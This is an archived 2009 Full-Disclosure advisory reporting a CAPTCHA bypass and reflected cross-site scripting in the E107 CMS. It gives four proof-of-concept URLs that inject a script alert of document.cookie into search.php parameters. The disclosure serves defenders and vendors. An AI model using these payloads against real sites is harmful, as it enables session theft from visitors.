[Full-disclosure] Vulnerabilities in E107



Hello Full-Disclosure!

I want to warn you about Insufficient Anti-automation and Cross-Site
Scripting vulnerabilities in E107. I found XSS holes in October 2006 and
Insufficient Anti-automation in November 2007, and disclosed them at
30.01.2009.

Insufficient Anti-Automation:

Vulnerability is in captcha at send link to news page
(http://site/email.php?news.1). And this captcha is also used at
registration page and forget password page.

http://websecurity.com.ua/uploads/2009/E107%20CAPTCHA%20bypass.html

Captcha is vulnerable to half-automated bypass method
(http://websecurity.com.ua/1595/), which I described in my project Month of
Bugs in Captchas (http://websecurity.com.ua/category/mobic/).

XSS:

Vulnerabilities are in search.php in parameters in, ex, ep and be.

http://site/search.php?in=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/search.php?ex=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/search.php?ep=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/search.php?be=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E

For XSS are vulnerable old versions of E107 and for Insufficient
Anti-automation are vulnerable all versions of E107.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/2841/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Relevant Pages

  • Vulnerabilities in E107
    ... I want to warn you about Insufficient Anti-automation and Cross-Site ... I found XSS holes in October 2006 and ... Vulnerability is in captcha at send link to news page ... Vulnerabilities are in search.php in parameters in, ex, ep and be. ...
    (Bugtraq)
  • Re: Vulnerabilities in phpCOIN
    ... I want to warn you about security vulnerabilities in system phpCOIN. ... These are Insufficient Anti-automation and Denial of Service ... The vulnerabilities exist in captcha script CaptchaSecurityImages.php, ...
    (Bugtraq)
  • [Full-disclosure] Vulnerabilities in CaptchaSecurityImages
    ... I want to warn you about security vulnerabilities in CaptchaSecurityImages. ... It's captcha script which is using at many web sites and engines. ... These are Insufficient Anti-automation and Denial of Service ...
    (Full-Disclosure)
  • Vulnerabilities in CaptchaSecurityImages
    ... I want to warn you about security vulnerabilities in CaptchaSecurityImages. ... It's captcha script which is using at many web sites and engines. ... These are Insufficient Anti-automation and Denial of Service ...
    (Bugtraq)
  • [Full-disclosure] Vulnerabilities in Easy Contact for WordPress
    ... Functionality and Cross-Site Scripting vulnerabilities in plugin Easy ... Insufficient Anti-automation: ... At contact page it's possible to send spam via function Carbon Copy (Email ...
    (Full-Disclosure)